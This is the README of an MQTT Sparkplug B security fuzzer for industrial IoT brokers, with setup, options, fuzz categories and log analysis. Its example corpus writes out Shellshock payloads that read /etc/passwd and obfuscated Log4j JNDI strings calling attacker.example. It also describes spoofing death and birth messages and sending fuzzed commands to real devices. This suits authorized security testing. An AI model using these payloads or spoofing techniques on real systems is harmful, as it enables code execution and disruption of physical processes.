Skip to content

BishopFox/sparkplugFuzzer

Repository files navigation

Sparkplug B MQTT Security Fuzzer

A comprehensive security assessment tool for testing Sparkplug B MQTT protocol implementations. The fuzzer systematically tests all protocol fields across all 9 message types, discovers live devices on the network, and produces detailed logs for analysis.

Responsible Use

This tool sends malformed, injection, and protocol-violating MQTT messages to a target broker. Only run it against systems you own or have explicit written authorization to test. Sparkplug B brokers commonly sit in OT/ICS environments where unexpected payloads can disrupt physical processes — assume every target is production-adjacent unless proven otherwise.

If you discover a vulnerability in a Sparkplug B implementation using this tool, please follow coordinated disclosure with the affected vendor. To report a security issue in this tool itself, see SECURITY.md.

Table of Contents

Overview

The Sparkplug B specification defines a topic namespace and payload format built on MQTT and Google Protocol Buffers for Industrial IoT (IIoT) environments. This fuzzer assesses the security and robustness of Sparkplug B implementations by:

  • Testing all 19 metric data types with boundary values and overflow conditions
  • Injecting malicious strings (XSS, SQLi, format strings, path traversal, command injection)
  • Creating type mismatches between declared datatypes and actual protobuf value fields
  • Violating protocol state machine ordering (data before birth, double births, data after death)
  • Corrupting serialized protobuf payloads at the binary level
  • Spoofing birth/death certificates for discovered network devices
  • Fuzzing MQTT topic namespaces with special characters, case variations, and structural violations

Prerequisites

  • Python 3.8+
  • MQTT Broker — the target system under test (e.g., Mosquitto, HiveMQ, EMQX, or any Sparkplug B aware broker)
  • Authorization — this tool is intended for authorized security testing only

Installation

On modern Debian/Ubuntu/Kali (PEP-668 systems), --setup cannot pip install into the system Python — use a virtual environment or pipx first. The recommended path:

python3 -m venv .venv
source .venv/bin/activate
python3 sparkplug-fuzzer.py --setup

Or run via pipx run if you prefer not to manage the venv yourself. On older systems without PEP-668 enforcement, plain python3 sparkplug-fuzzer.py --setup works directly.

--setup will:

  1. Install pip dependencies (paho-mqtt, protobuf)
  2. Clone a pinned tag of the Eclipse Tahu repository (see TAHU_REF in the script)
  3. Copy sparkplug_b.py and array_packer.py helper modules
  4. Compile sparkplug_b.proto into Python bindings (uses protoc if available, falls back to grpcio-tools)
  5. Clean up the Tahu clone

After setup, your directory should contain:

sparkplug-fuzzer.py     # The fuzzer
sparkplug_b.py          # Sparkplug B helper module (from Tahu)
array_packer.py         # Array packing helper (from Tahu)
sparkplug_b_pb2.py      # Generated protobuf bindings
requirements.txt        # Python dependencies
Manual setup (if --setup doesn't work)
pip install -r requirements.txt
git clone https://github.com/eclipse/tahu.git
cp tahu/python/core/sparkplug_b.py .
cp tahu/python/core/array_packer.py .
protoc --python_out=. sparkplug_b.proto
rm -rf tahu

Quick Start

python3 sparkplug-fuzzer.py --setup              # first-time setup
python3 sparkplug-fuzzer.py -H localhost -p 1883 -v  # run fuzzer

This will:

  1. Connect to the broker at localhost:1883
  2. Listen for 10 seconds to discover existing Sparkplug devices
  3. Establish the fuzzer as a Sparkplug node/device
  4. Run all 12 fuzz categories (~635+ test cases)
  5. Target any discovered devices with spoofed messages
  6. Write results to sparkplug_fuzz.jsonl

Usage

Command-Line Options

python3 sparkplug-fuzzer.py [OPTIONS]
Option Default Description
-H, --host localhost MQTT broker hostname or IP
-p, --port 1883 (or 8883 with --tls) MQTT broker port
-u, --username None MQTT username (also reads MQTT_USERNAME env var)
-P, --password None MQTT password (also reads MQTT_PASSWORD; pass - to read from stdin without echo)
--tls off Connect over TLS; default port becomes 8883 if -p unset
--cafile None CA bundle for TLS server certificate verification
--insecure off Skip TLS hostname/certificate verification (testing only)
-g, --group Sparkplug B Devices Sparkplug group ID the fuzzer registers under
-n, --node FuzzNode Sparkplug edge node ID for the fuzzer
-d, --device FuzzDevice Sparkplug device ID for the fuzzer
-c, --categories all Space-separated list of fuzz categories to run
--discovery-time 10 Seconds to passively listen for network discovery
--delay 0.1 Delay in seconds between fuzz messages
--probe-anon-write off During discovery, send one QoS=1 publish to confirm whether the broker accepts unauthenticated PUBLISH
-l, --log sparkplug_fuzz.jsonl Output log file name (relative paths land inside --output-dir; absolute paths are honored as-is)
--output-dir ./sparkplug-runs/<UTC-ts>_<host>/ Per-run output directory. Created if absent.
-v, --verbose 0 Increase console verbosity (-v = info, -vv = debug). -vv also surfaces fuzz-generator skips, and the throttled paho.mqtt logger bumps to INFO/DEBUG with verbosity.
--setup Install all dependencies and exit
--tahu-path Path to a local clone of eclipse/tahu (or its python/core directory). Used by --setup in air-gapped environments instead of git clone.
--extra-string-payloads Path to a file of additional string-injection payloads (one per line, UTF-8). Appended to the built-in STRING_FUZZ_VALUES; does not replace them. Max 10 MB / 10,000 payloads. See Custom string corpora.

Fuzz Categories

Category Description Approx. Cases
boundary Min/max/overflow for all 19 numeric data types, is_null with values, flag combinations ~200
string Injection payloads (XSS, SQLi, format strings, path traversal, command injection, null bytes) across String, Text, UUID, MetaData fields, and STATE messages ~100
type_mismatch Declared datatype vs wrong protobuf value field, invalid datatype codes, multiple oneof fields ~150
sequence Sequence gaps, duplicates, backwards, rollover, bdSeq mismatch between NBIRTH/NDEATH ~20
timestamp Zero, max uint64, far future/past, metric vs payload timestamp inconsistency, DateTime extremes ~15
alias Duplicate aliases for different metrics, extreme alias values, undefined aliases in data messages ~15
orphan Data/commands targeting non-existent devices, nodes, groups; undefined template references ~20
ordering Protocol state violations: data before birth, double births, data after death, wrong birth order ~15
recursive Nested PropertySet chains (depth 1-100), key/value length mismatches, PropertySetList variations ~15
dataset Column count mismatches, row element mismatches, type violations, empty/huge datasets, special chars in column names ~25
malformed Binary protobuf corruption: truncation, bit flips, random bytes, overlong varints, wrong message classes ~30
topic Case variations, wrong versions, extra/missing slashes, special characters, wildcards in topic strings ~30

Examples

Run all categories with authentication:

python3 sparkplug-fuzzer.py -H 10.0.1.30 -p 1883 -u admin -P secret -v

Pass credentials without exposing them in ps:

# Via environment
MQTT_USERNAME=admin MQTT_PASSWORD=secret python3 sparkplug-fuzzer.py -H broker.local

# Or read password from stdin (getpass — no echo)
python3 sparkplug-fuzzer.py -H broker.local -u admin -P -

Connect over TLS:

# System trust store, default port 8883
python3 sparkplug-fuzzer.py -H broker.example.com --tls -v

# Custom CA bundle
python3 sparkplug-fuzzer.py -H broker.example.com --tls --cafile ./ca.pem -v

Passive auth assessment + active write probe:

python3 sparkplug-fuzzer.py -H 10.0.1.30 --probe-anon-write -v

Run only injection-related categories:

python3 sparkplug-fuzzer.py -H broker.local -c string type_mismatch malformed

Extended discovery with slow pacing (minimize broker load):

python3 sparkplug-fuzzer.py -H 192.168.1.100 --discovery-time 60 --delay 0.5

Custom group/node identity and log file:

python3 sparkplug-fuzzer.py -H broker.local \
  -g "Production Floor" -n "TestNode01" -d "TestDevice01" \
  -l production_fuzz_results.jsonl -vv

Monitor broker traffic in a separate terminal:

mosquitto_sub -h <broker_host> -p 1883 -t 'spBv1.0/#' -F '%I %t %x'

Air-gapped setup with a pre-cloned Tahu repo:

git clone https://github.com/eclipse/tahu.git ~/tahu   # on a connected box
# transfer ~/tahu to the air-gapped target, then on the target:
python3 sparkplug-fuzzer.py --setup --tahu-path ~/tahu

Per-run output layout:

# Default — directory is auto-named under ./sparkplug-runs/
python3 sparkplug-fuzzer.py -H broker.local
# -> creates ./sparkplug-runs/2026-05-05_1830_broker.local/sparkplug_fuzz.jsonl

# Explicit directory:
python3 sparkplug-fuzzer.py -H broker.local --output-dir ./fuzz-runs/acme-2026Q2

Custom string corpora

The built-in STRING_FUZZ_VALUES covers the classic injection categories (empty / huge strings, null bytes, format strings, XSS, SQLi, path traversal, prototype pollution). Real engagements often need second-order payloads aimed at whatever consumes the broker's data downstream — historians piping metric names through shell, Java-based SCADA hosts feeding values into log4j, dashboards rendering tag names in HTML, etc.

The --extra-string-payloads <FILE> flag appends an additional corpus to the built-ins. Format is one payload per line, UTF-8. Whitespace-only lines are kept (often intentional in fuzz); fully blank lines are dropped. The flag adds to the built-in list rather than replacing it, so existing coverage is preserved.

# corpus.txt — Shellshock + Log4j JNDI prefixes
cat > corpus.txt <<'EOF'
() { :;}; /bin/cat /etc/passwd
() { :; }; echo VULN
${jndi:ldap://attacker.example/x}
${${::-j}${::-n}${::-d}${::-i}:ldap://attacker.example/x}
${${lower:jndi}:ldap://attacker.example/x}
EOF

python3 sparkplug-fuzzer.py -H broker.local --extra-string-payloads corpus.txt -v

The fuzzer prints [+] Extra string payloads: loaded N from <path> at startup, and each payload is emitted through every place that iterates STRING_FUZZ_VALUES — primarily the string category, but also the type-mismatch generator's string-typed cases.

Hard limits: 10 MB file size, 10,000 payloads. Adjust MAX_EXTRA_PAYLOADS_FILE_SIZE / MAX_EXTRA_PAYLOADS_COUNT at the top of the script if you need more (and have the run-time budget to match).

v0.2 release notes

  • --output-dir flag plus auto-created ./sparkplug-runs/<UTC-ts>_<host>/ default — every run lands in its own directory so artifacts don't collide between runs.
  • --tahu-path flag for --setup — points at a local clone of eclipse/tahu for air-gapped test environments where outbound git clone is blocked. The local source is never deleted on cleanup.
  • Console + JSONL timestamps forced to UTC with explicit Z suffix so cross-correlation with broker logs is timezone-arithmetic-free.
  • paho.mqtt logger throttled to WARNING by default; visible at INFO under -v, DEBUG under -vv. Per-packet client telemetry no longer drowns out fuzz signal.
  • pytest test harness under tests/ — 23 tests covering FuzzLogger, topic helper, output path resolution, and --tahu-path validation. See Running the tests.

Running the tests

The test harness covers the network-independent surface (logger correctness, topic builder, output-path resolution, --tahu-path parsing) and runs without a broker, paho-mqtt, or protobuf installed.

pip install -r requirements-dev.txt
pytest tests/

Expected: 23 passed. Network-dependent paths (PayloadBuilder protobuf, fuzz publishers, MQTT lifecycle) are deliberately deferred to a future integration-test layer with a containerized broker.

How It Works

Execution Flow

1. CONNECT      Connect to MQTT broker with NDEATH as last-will-and-testament
                Subscribe to spBv1.0/# and STATE/# for discovery
                    |
2. DISCOVER     Passively listen for Sparkplug traffic (configurable duration)
                Build map of groups, nodes, devices, and their metric definitions
                    |
3. ESTABLISH    Publish fuzzer's own NBIRTH + DBIRTH to register as a valid node
                    |
4. FUZZ         Run selected categories sequentially
                Each category generator yields (topic, payload, description) tuples
                Every publish logged via centralized _publish() method
                Configurable delay between messages
                    |
5. TARGET       For each discovered node/device:
                  - Spoof NDEATH (kill node)
                  - Spoof NBIRTH (impersonate node)
                  - Spoof DDEATH/DBIRTH (kill/impersonate device)
                  - Send DCMD/NCMD with fuzzed metric values
                    |
6. REPORT       Print summary (total TX/RX counts by category)
                Close log file, disconnect

Network Discovery

During the discovery phase, the fuzzer subscribes to spBv1.0/# and listens for all Sparkplug traffic. The DeviceTracker component parses observed messages to build a live network map:

  • NBIRTH messages reveal edge nodes and their metric definitions (name, alias, datatype)
  • DBIRTH messages reveal devices and their metric schemas
  • NDEATH/DDEATH messages track node/device lifecycle state
  • STATE messages reveal host applications and their online/offline status

This map is used in the targeted fuzzing phase to send contextually relevant attacks against real devices with their actual metric schemas.

Authentication Assessment

When the fuzzer connects without -u/-P (and MQTT_USERNAME/MQTT_PASSWORD aren't set), it derives a broker auth posture from passive discovery alone. This produces a single AUTH_ASSESSMENT event in the log and a printed summary:

Signal What it means How it's derived
anon_connect_accepted Broker accepted CONNECT without credentials The fuzzer's own CONNECT succeeded
anon_subscribe_accepted Broker forwards spBv1.0/# / STATE/# to anonymous clients At least one RX message arrived during the listen window
anon_publish_accepted Broker accepts PUBLISH from anonymous clients Set only if --probe-anon-write is passed; QoS=1 probe + PUBACK wait
unauth_endpoints Nodes / devices / host applications observable without auth Every entity in the discovered network map (auth was never produced)

The QoS=1 probe is opt-in because it crosses from passive into active. With QoS=0 the broker silently drops messages it would deny, so confirming write-accept requires reading a PUBACK.

MQTT/Sparkplug have no per-endpoint auth — auth is a broker-level concern. So "endpoints observable without authentication" is reported as a list of targets reachable at zero cost rather than as a property of the endpoints themselves.

Targeted Fuzzing

After systematic fuzzing, the tool targets each discovered device with:

  1. Spoofed death notices — publishes NDEATH/DDEATH to trick subscribers into thinking devices went offline
  2. Spoofed birth certificates — publishes NBIRTH/DBIRTH to impersonate discovered nodes/devices
  3. Command injection — sends NCMD/DCMD messages with boundary values for each known metric, testing whether the target validates inbound commands
  4. Rebirth commands — sends Node Control/Rebirth NCMD to trigger devices to republish their births

Output and Log Analysis

Log Format

The log file uses JSON-lines format (.jsonl) — one JSON object per line, suitable for analysis with jq, Python, or any JSON-capable tool.

Payloads larger than 64 KiB are not hex-inlined; instead payload_hex carries sha256:<digest>+len=<n> so the log stays bounded for very large fuzz cases. payload_len is always present.

TX record (outbound fuzz message):

{
  "ts": "2026-04-10T15:30:00.123456Z",
  "dir": "TX",
  "case_id": "BOUNDARY-0042",
  "category": "boundary",
  "topic": "spBv1.0/Sparkplug B Devices/DDATA/FuzzNode/FuzzDevice",
  "payload_hex": "0800120a0a06...",
  "payload_len": 28,
  "payload_decoded": {"timestamp": 1712345678000, "metrics": [{"name": "fuzz/boundary/Int32", "datatype": 3, "int_value": 2147483647}]},
  "description": "Boundary Int32 = 2147483647 (int_value)"
}

RX record (inbound message from network):

{
  "ts": "2026-04-10T15:30:01.456789Z",
  "dir": "RX",
  "topic": "spBv1.0/Production/NBIRTH/PLC01",
  "payload_hex": "0800120f...",
  "payload_len": 156,
  "payload_decoded": {"timestamp": 1712345679000, "metrics": [{"name": "Node Control/Rebirth", "datatype": 11, "boolean_value": false}]}
}

Event record (system event):

{
  "ts": "2026-04-10T15:29:50.000000Z",
  "dir": "EVENT",
  "event": "DISCOVERY_COMPLETE",
  "details": {"groups": ["Production"], "node_count": 3, "device_count": 7, "targets": 10}
}

Analyzing Results

Count cases by category:

grep '"dir": "TX"' sparkplug_fuzz.jsonl | jq -r '.category' | sort | uniq -c | sort -rn

Extract all string injection cases:

jq 'select(.category == "string")' sparkplug_fuzz.jsonl

List all discovered devices:

jq 'select(.event == "DISCOVERY_COMPLETE")' sparkplug_fuzz.jsonl

Find cases that triggered broker disconnects:

jq 'select(.event == "UNEXPECTED_DISCONNECT" or .event == "RECONNECT_FAIL")' sparkplug_fuzz.jsonl

Pull the authentication assessment:

jq 'select(.event == "AUTH_ASSESSMENT")' sparkplug_fuzz.jsonl

List endpoints reachable without authentication:

jq -r 'select(.event == "AUTH_ASSESSMENT") | .details.unauth_endpoints[] | [.kind, .group, .node, .device, .host_id, .status] | @tsv' sparkplug_fuzz.jsonl

Get TX count over time (for rate analysis):

grep '"dir": "TX"' sparkplug_fuzz.jsonl | jq -r '.ts[:19]' | uniq -c

Export all topics that were published to:

jq -r 'select(.dir == "TX") | .topic' sparkplug_fuzz.jsonl | sort -u

Analyze with Python:

import json

with open("sparkplug_fuzz.jsonl") as f:
    records = [json.loads(line) for line in f]

tx = [r for r in records if r["dir"] == "TX"]
rx = [r for r in records if r["dir"] == "RX"]
events = [r for r in records if r["dir"] == "EVENT"]

print(f"Total TX: {len(tx)}, RX: {len(rx)}, Events: {len(events)}")

# Find any decode errors in received messages (possible crash indicators)
errors = [r for r in rx if "_decode_error" in str(r.get("payload_decoded", {}))]
print(f"Decode errors in RX: {len(errors)}")

Protocol Coverage

Message Types

All 9 Sparkplug B message types are tested:

Message Type Topic Pattern Description Fuzzer Usage
NBIRTH spBv1.0/{group}/NBIRTH/{node} Node birth certificate Establishes fuzzer presence; spoofed for discovered nodes; ordering tests
NDEATH spBv1.0/{group}/NDEATH/{node} Node death notification MQTT last-will; spoofed for discovered nodes; ordering tests
DBIRTH spBv1.0/{group}/DBIRTH/{node}/{device} Device birth certificate Establishes fuzzer device; spoofed for discovered devices; ordering tests
DDEATH spBv1.0/{group}/DDEATH/{node}/{device} Device death notification Spoofed for discovered devices; ordering tests; orphan tests
NDATA spBv1.0/{group}/NDATA/{node} Node data update Boundary values; sequence numbers; ordering tests
DDATA spBv1.0/{group}/DDATA/{node}/{device} Device data update Primary vehicle for most fuzz categories
NCMD spBv1.0/{group}/NCMD/{node} Node command Targeted fuzzing (rebirth commands); orphan tests
DCMD spBv1.0/{group}/DCMD/{node}/{device} Device command Targeted fuzzing against discovered device metrics; orphan tests
STATE STATE/{host_id} Host application state (JSON) Malformed JSON injection

Data Types

All 19 Sparkplug B metric data types are tested with type-specific boundary values:

Code Type Protobuf Field Boundary Values Tested
1 Int8 int_value 0, -128, 127, 128 (overflow), -129 (underflow)
2 Int16 int_value 0, -32768, 32767, overflow/underflow
3 Int32 int_value 0, -2^31, 2^31-1, overflow/underflow
4 Int64 long_value 0, -2^63, 2^63-1, overflow
5 UInt8 int_value 0, 255, 256, -1
6 UInt16 int_value 0, 65535, 65536, -1
7 UInt32 int_value 0, 4294967295, -1
8 UInt64 long_value 0, 2^64-1, -1
9 Float float_value 0.0, -0.0, max, min, inf, -inf, NaN
10 Double double_value 0.0, -0.0, max, min, inf, -inf, NaN
11 Boolean boolean_value True, False; also tested with raw int values (0, 1, 2, 255)
12 String string_value Empty, long (up to 64KB), injection payloads
13 DateTime long_value Epoch, max, far future/past
14 Text string_value Same injection payloads as String
15 UUID string_value Empty, valid, invalid format, injections
16 DataSet dataset_value Structural violations via dataset category
17 Bytes bytes_value Empty, null bytes, random, large
18 File bytes_value Empty, magic bytes, large
19 Template template_value Undefined references, orphan templates

Field Coverage

The fuzzer covers 87+ unique protobuf field paths including:

  • Payload root fields: timestamp, seq, uuid, body, metrics
  • Metric fields: name, alias, timestamp, datatype, is_historical, is_transient, is_null, metadata, properties, and all value oneof variants
  • MetaData fields: is_multi_part, content_type, size, seq, file_name, file_type, md5, description
  • PropertySet/PropertyValue: keys, values, type, is_null, recursive propertyset_value, propertysets_value
  • DataSet: num_of_columns, columns, types, rows, elements, all DataSetValue variants
  • Template: version, template_ref, is_definition, nested metrics, parameters

Architecture

The fuzzer is a single Python file organized into these components:

sparkplug-fuzzer.py
    |
    +-- Constants / ALL_METRIC_TYPES / STRING_FUZZ_VALUES
    |       Type definitions and fuzz value tables
    |
    +-- FuzzLogger
    |       JSON-lines file logging + console output
    |       Protobuf payload decoding
    |
    +-- DeviceTracker
    |       Passive network discovery
    |       Tracks groups, nodes, devices, metrics
    |
    +-- PayloadBuilder
    |       Valid payload construction (sparkplug_b helpers)
    |       Raw payload construction (sparkplug_b_pb2 direct)
    |       Binary corruption (truncate, flip, append)
    |
    +-- 12 Fuzz Generators
    |       Each is a Python generator yielding (topic, bytes, desc)
    |       Covers boundary, string, type, seq, timestamp, alias,
    |       orphan, ordering, recursive, dataset, malformed, topic
    |
    +-- SparkplugFuzzer
    |       Orchestration: connect, discover, fuzz, target, report
    |       Centralized publish with logging
    |       Auto-reconnect on disconnect
    |
    +-- CLI (argparse) + main()
            Argument parsing and entry point

The two-level payload construction is a key design decision:

  • High-level (PayloadBuilder.node_birth(), etc.) uses sparkplug_b helper functions to build valid, well-formed payloads. Used for establishing presence and targeted spoofing.
  • Low-level (PayloadBuilder.raw_payload(), corrupt_bytes()) directly manipulates sparkplug_b_pb2 protobuf objects or raw bytes, bypassing validation. Used for intentionally malformed payloads that test parser error handling and edge cases.

License

This project is licensed under the MIT License — see LICENSE for the full text.

Third-Party

sparkplug-fuzzer.py --setup fetches the following components from Eclipse Tahu at install time and copies them into the working directory:

  • sparkplug_b.py — Sparkplug B helper module
  • array_packer.py — Array packing helper
  • sparkplug_b.proto — Protocol Buffer definition (used to generate sparkplug_b_pb2.py)

Eclipse Tahu is distributed under the Apache License, Version 2.0. None of the Tahu source files are redistributed in this repository. See NOTICE for the full attribution.

About

Fuzzer for the Sparkplug B IIoT protocol

Resources

License

Contributing

Security policy

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors

Languages